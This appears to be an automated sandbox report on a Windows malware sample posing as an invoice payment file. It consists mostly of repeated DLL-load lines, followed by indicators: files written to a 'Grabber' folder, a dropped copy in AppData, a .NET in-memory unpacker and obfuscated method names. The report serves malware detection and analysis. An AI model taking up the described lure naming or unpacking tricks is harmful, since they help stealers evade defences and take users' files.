Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File written: C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.11.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.11.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, C0iQR0D43d47cjyFBd.cs	.Net Code: kqDGFhWKI5 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, C0iQR0D43d47cjyFBd.cs	.Net Code: kqDGFhWKI5 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, C0iQR0D43d47cjyFBd.cs	.Net Code: kqDGFhWKI5 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DE05A pushfd ; ret	0_2_077DE061
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DD04B push CC077DCCh; retf	0_2_077DD051
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01310717 push eax; retf 0070h	6_2_013106F2
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01310708 push eax; retf 0070h	6_2_01310712
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_013106B7 push eax; retf 0070h	6_2_013106F2
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_01310687 push eax; retf 0070h	6_2_01310712
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B7E590 push es; ret	6_2_05B7E5A0
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B7053A push eax; ret	6_2_05B70545
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 6_2_05B7EC58 push esp; iretd	6_2_05B7EC59
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CE05A pushfd ; ret	7_2_075CE061
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 7_2_075CD04A push CC075CCCh; retf	7_2_075CD051
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_017105A8 push eax; retf 0070h	11_2_017106F2
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_017105A8 push eax; retf 0070h	11_2_01710702
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_017105A8 push eax; retf 0070h	11_2_01710712
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_017106E1 push eax; retf 0070h	11_2_017106E2
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E0538 push eax; ret	11_2_060E0545
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060EEC58 push esp; iretd	11_2_060EEC59
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Code function: 11_2_060E179C push eax; iretd	11_2_060E179D

Source: Invoice-BL. Payment TT $ 28,945.99.exe	Static PE information: section name: .text entropy: 7.663019801526044
Source: SFHAWxtoIpgL.exe.0.dr	Static PE information: section name: .text entropy: 7.663019801526044

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, h4lYD5IJa5m0H7VCFS.cs	High entropy of concatenated method names: 'ToString', 'e71AymKn53', 'Le6AhCnsm6', 'alhArGaOK8', 'FNyAU4PoXC', 't3TAi6Rdsf', 'PpvARgwcpk', 'kHTAdsPa93', 'fUaAuPD1jM', 'ATdA2IuWYg'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, EklOXQ47wlfNTuHg21.cs	High entropy of concatenated method names: 'FKcF2ZWva', 'eV97RrEYa', 'HfrQ1aNUg', 'tUR6oicAr', 'lMXt4spr7', 'J1ckK406T', 'CGxoZqYughXDxt9HGS', 'hQtNHVwnZUHPdBUUYY', 'rEjEFUlLC', 'bsaTTY20M'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, kt5pdYHmXsR4vfWNE9.cs	High entropy of concatenated method names: 'XHcCjVL22N', 'hhHCt3ytRQ', 'BUHCP5V9nf', 'g14Chov5jZ', 'zMhCUxxMOu', 'YmYCiTHsL9', 'dTcCdRQClQ', 'ywNCu7h8IX', 'At1CgImxEI', 'kMCCya9ht1'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, H8HxJ7t2s1tCvkvPPw.cs	High entropy of concatenated method names: 'cNPm7Vofpa', 'GHmmQhwEul', 'rBHmjW9sNG', 'bOOmtrcLLY', 'aecm0k51ff', 'Kw5mAZqw3h', 'kyXmV8RX2k', 'SqpmEATnlM', 'A1Tmx3hEO8', 'WtxmTVYGF3'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, HVXTMmNBdL0eEbmBcN.cs	High entropy of concatenated method names: 'mkJTmprh9B', 'aHMTnjovso', 'ALlT5t1x7x', 'cEcTlrYlAt', 'XKtTxZtSaI', 'o5TTD5NWkp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, V3ndQtvfQvQpVGc2MJ.cs	High entropy of concatenated method names: 'CfmxPWWQ2v', 'pmlxhoHRVr', 'xD8xr3ZHSL', 'ub6xUUpZJj', 'ac2xiIIUto', 'aytxRsvYK4', 'kVvxduqdPP', 'QrKxu7IHtw', 'Yc5x2qGHbB', 'JOKxgcI5xc'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, hISyLRzJbYpQYFqw0n.cs	High entropy of concatenated method names: 'DIBTQI2SUF', 'A7qTj37lTd', 'oi2Tt8Ql81', 'fntTPMybtu', 'SaxThVTLAc', 'VCFTUuteWR', 'aRcTi6M4Mu', 'T43TfFqyMQ', 'cLGT1uiiNF', 'au5TckkRcp'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, C0iQR0D43d47cjyFBd.cs	High entropy of concatenated method names: 'OlnwaYyTkn', 'RaZw91HoGs', 'tBfwOWRNEr', 'w96wmekS9S', 'utvwnae0Ov', 'ADYw55uYTY', 'FCTwlvDQGR', 'O8WwDZqoHp', 'h5CwbPTOuO', 'c8fwYOCgPk'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, iXWQNROBtkFQiV4I7E.cs	High entropy of concatenated method names: 'Dispose', 'oapMv8DJqM', 'EJN4hM0U6Q', 'LEfksvcLN6', 'FUdMN3V7Py', 'cgvMzt1o3X', 'ProcessDialogKey', 'JZq4L3ndQt', 'xQv4MQpVGc', 'MMJ44hVXTM'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, wfPo0aP0fgAaJ3wKuG.cs	High entropy of concatenated method names: 'hpp5aTgEpX', 'KRd5O12AdP', 'ePK5nGv0PG', 'PNw5ln6JD4', 'Imj5DLhHnh', 'zERn3r35G3', 'E1XneSU7bs', 'R0vnq0pP3e', 'jhJnWlUAKv', 'f3UnvDuVu6'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, dRxsWOSkbOtfmAp83S.cs	High entropy of concatenated method names: 'vqgVYwv7Zj', 'KbjVKrsTGV', 'ToString', 'dCbV9YS3I5', 'SN0VOBTAuG', 'sW5VmEfKHY', 'QklVnudiFY', 'AoBV5MyHYv', 'XHoVl98us6', 'jI2VDlnKpS'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, P7pQ2rs9fTNQTET8uj.cs	High entropy of concatenated method names: 'QFv0gn6ndv', 'rjk0pLiD5T', 'wLX0sdBKEp', 'SBT0ooITOO', 'kBs0hW6WXU', 'dQo0rtgEfP', 'mIZ0U3KnFe', 'r6A0iLaxvP', 'EpV0R00NJy', 'ms40d4Qwks'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, LYe286dRWyMXy75FBn.cs	High entropy of concatenated method names: 'ikkl9ntruK', 'Y3ulmF15Ex', 'qiml5un4TB', 'dve5NaKLP1', 'Itq5zE64Xw', 'zDDlL6WqLu', 'aeElMRWJSM', 'C84l4yb9gR', 'A4olwR1jH4', 'RdJlG24ym5'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, TJ7KcYqQH0ap8DJqMk.cs	High entropy of concatenated method names: 'S6fx0mgpBd', 'MZWxVgao9Y', 'ToAxxba51i', 'UOIxJcUJmo', 'PjLxXk1fRR', 'OQFxfnTiAf', 'Dispose', 've8E9tMbJV', 'ix5EO9Js5H', 'jb1Em6I3dj'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, kGdoZrhGfmLGMyS8UW.cs	High entropy of concatenated method names: 'aPnEqBdgaZ3YRefv2Zh', 'rSwMyodXcR4jIFueqpb', 'cjE5EWPHCy', 'fNp5xD1eWv', 'WZT5Tx8teg', 'CBWQYud3EKxKsVV1pU3', 'AGystFd0UsAljekEOr7'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, xOrxTajS3eLdlREM37.cs	High entropy of concatenated method names: 'R1wOsqHiAS', 'zyZOoAEtiw', 'JD8OIZCBsJ', 'sOvOSDa1W3', 'MQXO3CbP3s', 'O46OePwaq9', 'r00Oq9gao5', 'LnKOWpLXmt', 'YkyOvnaOaS', 'DQkONULkBC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, wnafTfGOq4Qp8i9Udd.cs	High entropy of concatenated method names: 'md1MlOrxTa', 'T3eMDLdlRE', 'A2sMY1tCvk', 'YPPMKwCt9Y', 'g64M02wBfP', 'R0aMA0fgAa', 'zj1K668ZBc1O2tVYQL', 'AHy81d4jysa48mOIZQ', 'CoYMMMVoE4', 'IoFMwexnpC'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, R2hAFDMMXBFIQMXKngc.cs	High entropy of concatenated method names: 'SEaTNZBUiB', 'rsHTz3G7ue', 'iSvJL4Xhhe', 'tidJMohQLi', 'OGkJ4SuFyW', 'eJFJwcJ5ls', 'iEeJGjQpfq', 'NNIJa3xulG', 'XwYJ90G0GU', 'VN5JO59tvW'
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, j3gNRt2XrVAVmnRRAA.cs	High entropy of concatenated method names: 'kWBl1YaDmm', 'zXTlcpsWxC', 'sZxlFmIsX7', 'Hkvl7rGAnP', 'ksLlZxDxnp', 'QBclQB6UPB', 'WVkl6ne13X', 'jOxljU00yv', 'awKltvfRH6', 'kBelkTtHeL'
